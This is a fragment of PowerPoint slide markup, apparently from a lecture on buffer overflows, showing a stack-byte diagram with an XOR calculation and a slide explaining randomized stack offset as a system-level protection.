                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A4144F5-33F9-C346-B342-1A531D8B926B}"/>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69" name="Rectangle 68">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDCE2A22-5831-3E43-BEB8-4F118023902B}"/>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0" name="Rectangle 69">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6276368-FE10-F947-B355-C5507CC12721}"/>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CB2C6F00-9951-1C4E-B4FD-264545018785}"/>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0C94AD8D-5E42-6845-ABEB-4BDD19F749EE}"/>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47E16648-EFBD-6945-BD94-BE1CD0CF7302}"/>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0C37F31F-F8A3-C04D-B37F-7DAE2ADA2782}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79D771EE-A104-C448-8CCA-11C631862D76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="502900" y="5636731"/>
            <a:ext cx="6061275" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x7442F30F9497A000 ^ 0x7442F30F94970069 = 0xA069</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="137" name="Group 136">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCE6D9CC-A362-F548-A541-B291882966F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="370156" y="2206357"/>
            <a:ext cx="4830980" cy="3175952"/>
            <a:chOff x="197157" y="2192004"/>
            <a:chExt cx="4830980" cy="3175952"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="138" name="Group 137">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5985B4C0-50CE-1F42-90EC-B1BE7DC2991F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="197157" y="4573950"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="166" name="Rectangle 165">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E348A6A-D35B-F547-8C73-6DD53F94EBB2}"/>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167" name="Rectangle 166">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1630AB6F-DCD6-E342-B27A-D78F6BEA2C02}"/>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168" name="Rectangle 167">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBDF64E8-A7B3-E147-BC2C-56CC9974541A}"/>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169" name="Rectangle 168">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DBADC42-BEB9-D444-B00D-7164EDF22160}"/>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170" name="Rectangle 169">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4348716F-55D3-3544-B956-9BBF7640F88E}"/>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171" name="Rectangle 170">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01B18F1F-C6CF-C342-A985-EED058253D6C}"/>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172" name="Rectangle 171">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C82BC5D9-F52F-6940-B3F9-8E809A6A551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173" name="Rectangle 172">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{705123C9-72FC-0340-94CE-CEF68109636A}"/>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139" name="Group 138">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42DB9284-CC54-FF4D-8712-D6F97F93E575}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="197157" y="2985997"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="158" name="Rectangle 157">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E11A6BD-166D-5246-9A0B-E6E87217BFAF}"/>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59" name="Rectangle 158">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64E00FCE-6A96-8346-ABDB-B7DE7D26CFC2}"/>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0" name="Rectangle 159">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95ECC865-17DB-AB44-BDA2-E9404428773E}"/>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1" name="Rectangle 160">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD54DE3C-794E-324F-8E29-A1DBFAADB574}"/>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2" name="Rectangle 161">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D78A9DEB-55F5-B949-B107-BD9F4E7981D3}"/>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3" name="Rectangle 162">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F851C885-4AE8-5A4A-AB6B-CEB7F2FBF21D}"/>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4" name="Rectangle 163">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B99701F1-E91A-3248-9E1A-E5B3DCAA1FC2}"/>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5" name="Rectangle 164">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A50E1284-5A8A-A94F-A1E2-C93AFA86C5F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40" name="Group 139">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{752CC03B-A626-C449-90FA-098BE5E97580}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="197157" y="3779967"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="150" name="Rectangle 149">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E12B1FA5-BACC-0B45-8410-F65CB417580E}"/>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74</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="151" name="Rectangle 150">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF5E9B49-B933-2C44-BF39-60117BB03E03}"/>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42</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="152" name="Rectangle 151">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2889E522-3A1D-FF44-92A1-441DF02DEB2A}"/>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F3</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="153" name="Rectangle 152">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{278689C9-CC7E-FD48-B723-AFCAE247A269}"/>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0F</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="154" name="Rectangle 153">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E079724-8DAF-A640-B88B-2D0F7FE56174}"/>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94</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="155" name="Rectangle 154">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43E2839A-2397-944D-AC46-75E0CCE205FC}"/>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97</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="156" name="Rectangle 155">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23ADADBD-EF7E-6E43-AB67-7F00818A078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00</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="002060"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>NUL</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="157" name="Rectangle 156">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0946F6DE-2E84-0944-91A3-D18DC54CCA4E}"/>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69</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="002060"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" err="1">
                    <a:solidFill>
                      <a:srgbClr val="002060"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>i</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="002060"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="141" name="Group 140">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2D2DC92-ADB0-8E4F-9707-6919F4EBC601}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="197157" y="2192004"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="142" name="Rectangle 141">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE2DB249-0F9E-F544-851F-511ED5E5F7BB}"/>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3" name="Rectangle 142">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0607153-546F-FF4B-8758-B01D044E744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4" name="Rectangle 143">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9284244-B9AA-7C4E-B723-450DF8FE8CFA}"/>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5" name="Rectangle 144">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4D0150D-5736-FA4C-95E3-2370B90D4BE1}"/>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6" name="Rectangle 145">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{078553CA-9672-7F4F-A65C-5B2609A2629A}"/>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7" name="Rectangle 146">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CD72721-6755-CA41-9431-07EE5A480029}"/>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8" name="Rectangle 147">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4A9ABEB-B0E0-2740-A069-B7865422440F}"/>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9" name="Rectangle 148">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECB57843-812B-134D-9A13-41C43CC0C534}"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69587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randombar(vertic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randombar(vertical)">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System-Level Protections</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1. Randomized Stack Offset</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Content Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA2FD321-E9E8-9E42-AB28-B6ABE2D44AD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="7898409" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At start of program, allocate random amount of space on stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shifts stack address for entire program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Makes it harder to predict buffer’s address of injected code</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ight Brace 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65E20086-2D68-9A4C-ADF3-743718B27871}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10656449" y="4609583"/>
            <a:ext cx="277793" cy="1713297"/>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798E81CB-6305-0547-8B05-A00D6BE4AB59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10934242" y="514982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14" name="Right Brace 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E89BB6AA-E1C3-4D4C-AB46-0B5E1711D3F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10656451" y="2890911"/>
            <a:ext cx="277791" cy="1685202"/>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43AE17AD-B3A8-0742-ADFD-2357E6EBBB41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10934243" y="3410346"/>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16" name="Right Brace 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B73723F-3B7C-3942-A9A5-6538D76A09F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10656449" y="1534939"/>
            <a:ext cx="277793" cy="798653"/>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2013FD7C-DFBE-1246-9F71-22A80B93F96F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7468251" y="806917"/>
            <a:ext cx="1123193" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Random</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allocation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F384A1D6-8ADA-8C41-925E-0EE675269D9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6787588" y="1525097"/>
            <a:ext cx="3646024" cy="4995962"/>
            <a:chOff x="6588078" y="1369584"/>
            <a:chExt cx="3646024" cy="4995962"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Rectangle 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2136AC46-0257-CB41-9CDB-34959A1ECFF2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8764118" y="1369584"/>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8E523807-629B-304F-9D4C-AA674A74B090}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8764118" y="2168238"/>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2" name="Rectangle 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69895580-A198-6643-B7FB-B363040169FF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8764118" y="2739569"/>
              <a:ext cx="1469984" cy="11432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ED92C1CD-9315-7E47-9392-2EB2204A7F44}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8764118" y="388693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4" name="Rectangle 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{104F5E3F-5110-3044-9842-A5CEA941543D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8764118" y="4454070"/>
              <a:ext cx="1469984" cy="172681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5" name="TextBox 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56BD699F-55DF-9248-98CF-2F87B16F84FC}"/>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6" name="Straight Arrow Connector 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9470737C-AE87-4D41-98EC-DC66CC31C34F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="25"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9E8927C6-57F7-3641-BB3F-DC76C78C6578}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8959448" y="5298217"/>
            <a:ext cx="1469984" cy="467508"/>
            <a:chOff x="9124092" y="5147021"/>
            <a:chExt cx="1305340" cy="467508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Rectangle 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7070891-F3E7-3145-8BA1-C0557EF0CAB5}"/>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352149-E3DA-F44B-A84F-9B53E5728F32}"/>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BB88D9E-4015-4144-9FE2-30B7C482E8F3}"/>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ACEEB7-7064-A148-811C-7F81085E0C3C}"/>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0D6AA34-B38C-5C47-9EDB-704C8A45A83E}"/>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B133E93-C158-324E-97D8-934F09EE4D0C}"/>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F023281-72D7-BC4E-81DD-41FE19987FD6}"/>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99E4E44-5B39-8348-BB4C-8CBE91E8D58B}"/>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BDC3CAB1-58D8-4441-BE61-99CA2C22167F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6787588" y="5347287"/>
            <a:ext cx="1408527" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="37" name="Straight Arrow Connector 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FCE8E0F-07F6-8F4C-918A-1719993516EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="36" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8196115" y="5531953"/>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E9A13D4-2313-EB4A-815D-3E60A5574C2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8959448" y="737691"/>
            <a:ext cx="1469984" cy="798653"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F7C1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Right Brace 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94735AD4-8B1D-9140-8E82-A70CA3F03E7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8564275" y="736286"/>
            <a:ext cx="277793" cy="798653"/>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D5DBC6FF-7B31-1E47-845A-0545481C6677}"/>
